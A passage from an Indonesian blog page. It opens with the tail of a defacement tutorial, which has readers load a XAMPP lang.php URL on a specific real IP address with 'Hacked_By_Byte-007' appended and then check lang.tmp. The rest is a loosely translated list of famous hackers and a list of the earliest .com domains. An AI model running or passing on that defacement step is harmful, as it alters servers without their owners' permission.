abis tuh ganti http://110.4.47.228/xampp/index.php dengan http://110.4.47.228/xampp/lang.php?Hacked_By_Byte-007 abis tuh enter

kalo tampilan udah seperti ini langsung aja buka
http://110.4.47.228/xampp/lang.tmp



Jadi deh :P simple kan?

0 komentar:

The Best Hacker All Years

Hacker adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. Hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari pada yang telah dirancang bersama.

Berikut 5 Hacker Terbaik Sepanjang Masa :

1. Kevin Mitnick

Inilah legenda hidup yang saat ini benar-benar mantap dalam dunia hacking, berikut prestasi Kevin Mitnick didunia hacking :
* Menggunakan Los Angeles bus transfer system buat mendapatkan tumpangan gatis
* Mengelabui FBI
* Hacking kedalam DEC system (Digital Equipment Corporation)
* Mendapatkan administrator positon dalam satu komputer IBM biar menang judi
* Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems Seorang white hat hacker yang cukup ternamapun Tsutomu Shimomura pun (ahli juga dia dan merupakan top 5 white hat hacker) pernah dihack komputer systemnya, dan terjadilah perang luar biasa.
Dia dilacak dan ditangkap oleh FBI dengan bantuan Tsutomu Shimomura yang melacak (tracking) lewat jaringan HP yang dibawa oleh Mitnick saat itu. Tapi sekarang dia sudah tobat dan menjadi seorang penulis buku, konsultan security, dan pembicara.

2. Jonathan James 

James adalah orang Amerika, saat baru umur 16 taun dia dikirim ke penjara karena kelakuannya di dunia maya. Situs Departemen Pertahanan Amerika dibobol olehnya dan dia cuma bilang itu tantangan bagi dia dan merupakan suatu kesenangan tersendiri. NASA juga terkena dampak keisengan dia, James mencuri software NASA yang diperkirakan seharga $1.7 juta dollar AS. Sehingga NASA dipaksa untuk mematikan server dan sistemnya. James dijatuhi hukuman enam bulan tahanan rumah dan masa percobaan sampai usia delapan belas tahun, dan diwajibkan untuk menulis surat permintaan maaf kepada NASA dan Departemen Pertahanan. Dia juga dilarang menggunakan komputer untuk tujuan rekreasi. Namun, hakim dalam kasus ini kemudian terbalik keputusannya dan membiarkan James untuk melayani enam bulan di bawah tahanan rumah, dengan masa percobaan sampai usia dua puluh satu. James kemudian melanggar masa percobaan bahwa ketika ia diuji positif untuk penggunaan narkoba dan kemudian selanjutnya ditahan oleh Amerika Serikat Layanan Marshall dan diterbangkan ke fasilitas federal Alabama pemasyarakatan di mana ia akhirnya menjabat enam bulan Karena kelakuannya, dia juga tidak boleh menyentuh komputer selama 10 tahun.
Tapi sekarang dia sudah di jalan yang benar dan bikin sebuah perusahaan keamanan di bidang komputer.

3. Adrian Lamo 

Dia membobol New York Times untuk mendapatkan info personal dan beberapa security number dan membobol Microsoft. Dia akhirnya didenda $65.000 dollar US. Saat ini dia jadi pembicara di beberapa acara seminar. Ketika ditantang untuk menanggapi tuduhan bahwa ia glamorizing kejahatan demi publisitas, tanggapannya adalah "Apa pun yang bisa saya katakan mengenai saya atau tindakan seseorang saya hanya akan memurahkan apa yang mereka katakan untuk diri mereka sendiri". Ketika didekati untuk komentar selama kasus pidana, Lamo frustrasi dengan sequiturs non wartawan seperti "Iman mengelola", (mungkin referensi untuk fiksi ilmiah televisi menunjukkan Babel 5) dan "Ini hari yang indah.
Pada hukumannya, Lamo menyatakan penyesalan atas kerusakan yang telah disebabkan melalui intrusi, dengan catatan pengadilan mengutip dia sebagai menambahkan "saya ingin menjawab atas apa yang telah saya lakukan dan lakukan lebih baik dengan hidup saya.

4. Kevin Poulsen 

Sebelum segueing ke jurnalisme, ia memiliki karir yang kontroversial pada 1980-an sebagai seorang hacker yang menangani adalah Dark Dante. Ia bekerja untuk SRI International siang hari, dan hack pada malam hari. Selama waktu ini, Poulsen diajarkan kunci memilih dirinya sendiri, dan terlibat dalam foya kurang ajar berteknologi tinggi aksi yang pada akhirnya akan membuat dia salah satu yang paling terkenal Amerika penjahat cyber. Antara lain, Poulsen diaktifkan kembali nomor lama mengawal Halaman Kuning telepon untuk kenalan yang kemudian berlari agensi escort virtual.
Dia Juga dikenal dengan Dark Dante. Dia menghack database FBI. Selain itu dia juga menghack seluruh lines phone station karena Memang kemahiran dia menghack lewat phone lines. Saat ini dia jadi senior editor di Wired News, Pada Oktober 2006, Poulsen merilis informasi merinci pencarian yang sukses bagi para pelanggar seks yang terdaftar menggunakan MySpace untuk meminta seks dari anak-anak. Karyanya mengidentifikasi 744 orang yang terdaftar dengan profil MySpace, dan menyebabkan penangkapan salah satu, Andrew Lubrano.

5. Karl Koch 

Dia berasal dari hannover Jerman yang menamakan komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer). Dia melakukan beberapa keberhasilan dalam menghack pada kurun waktu 1985-1988. Dia juga seorang cocaine addict. Dia berhasil membobol beberapa sistem militer AS dan menghack sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hackingnya dijual ke KGB (Agen Rahasia Uni Soviet). Dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun siapa tahu ini merupakan konspirasi tingkat tinggi antara US dan Soviet pada perang dingin.



Sumber: http://blog.xeno-info.tk

0 komentar:

ini dia Domain dan Website pertama di dunia !!


Tahun 80-an mungkin kita tidak akan mengira bahwa perkembangan internet akan sepesat dan secanggih saat ini. Pada masa-masa tersebut mungkin kita tidak akan berpikir bagaimana nikmatnya berbagi video, musik bahkan pengalaman pribadi lewat dunia internet. Pun di masa “Oldest” tersebut tidak akan pernah terbayangkan bila kita bisa melakukan transaksi online yang melibatkan orang-orang dari seluruh dunia tanpa dibatasi lagi masalah jarak dan waktu.

Bila kita kembali ke masa-masa pertama kali dunia internet muncul, yang terpikir oleh kita mungkin apa sih domain atau website yang pertama kali muncul di dunia ini? Dan bisa dinikmati oleh seluruh orang dari seluruh dunia? Apakah Yahoo, Microsoft ataukah mungkin Google sang raja search engine?
Pada masa-masa pertama kali muncul, domain yang paling dominan adalah berakhiran dot-com, sangat jarang atau malah tidak bervariasi seperti saat ini. Jangan mengharapkan pas pertama kali muncul anda bakal menemui domain berakhir dot-tv atau dot-co-id atau malah dot-web-id.

Domain dot-com yang pertama di Dunia
Bukan Yahoo, bukan microsoft dan juga bahkan bukan Google, ternyata domain dot-com pertama kali di dunia adalah symbolics.com. Domain ini menjadi domain dot-com pertama yang didaftarkan pada tanggal 15 Maret 1985, atau hampir lebih 23 tahun yang lalu. symbolics.com adalah sebuah website tentang komputer dan sayangnya pada akhir 90-an symbolics dinyatakan bangkrut, meskipun symbolics.com nya masih tetap bisa kita akses sampai sekarang dengan penampilan yang semirip mungkin dengan penampilan pertama kalinya.

Domain dot-com lainya yang terkenal dan masuk 25 besar mungkin hp.com yang berada pada posisi ke-9 (didaftarkan pada tanggal 3 Maret 1986), intel.com menyusul 22 hari kemudian tepatnya tanggal 25 Maret 1986 dan berada pada positi ke-13. adobe.com muncul pada tanggal 17 Nopember 1986 bersamaan dengan munculnya amd.com.

Lalu kapan Yahoo, Microsoft atau Google muncul? Microsoft baru membeli microsoft.com pada bulan Mei 1991, Yahoo sendiri mulai terdaftar di Bulan Januari pada tahun 1995, dan Google sebagai search engine nomor satu di dunia saat ini, baru mendaftarkan google.com pada bulan September tahun 1997.
Bagaimana dengan tasikisme.com sendiri? Yups tasikisme.com baru seumur jagung, kalau diibaratkan seorang manusia, tasikisme.com baru memasuki usia balita. Baru terdaftar pada tanggal tanggal 06 Februari 2008 silam, jadi saat ini sampai bulan Desember 2008, tasikisme.com baru berusia 10 bulan lebih.
Untuk lengkapnya. Inilah 25 besar domain dotcom pertama kali di dunia.

symbolics.com : 15 Maret 1985
bbn.com : 24 April 1985
think.com : 24 Mei 1985
mcc.com : 11 Juli 1985
dec.com : 30 September 1985
northrop : 7 Nopember 1985
xerox.com : 9 Januari 1986
sri.com : 17 Januari 1986
hp.com : 3 Maret 1986
bellcore.com : 5 Maret 1986
ibm.com : 19 Maret 1986
sun.com : 19 Maret 1986
intel.com : 25 Maret 1986
ti.com : 25 Maret 1986
att.com : 25 April 1986
gmr.com : 8 Mei 986
tek.com : 8 Mei 986
fmc.com : 10 Juli 1986
ub.com : 10 Juli 1986
bell-atl.com : 5 Agustus 1986
ge.com : 5 Agustus 1986
grebyn.com : 5 Agustus 1986
isc.com : 5 Agustus 1986
nsc.com 5 Agustus 1986
stargate.com : 5 Agustus 1986


kalau website pertama di indonesia itu : http://indonesia.elga.net.id/ itu cuma webnya saja,domain pertama di indonesia ane ga nemu sourcenya



Sumber :http://www.irham.co.cc

0 komentar: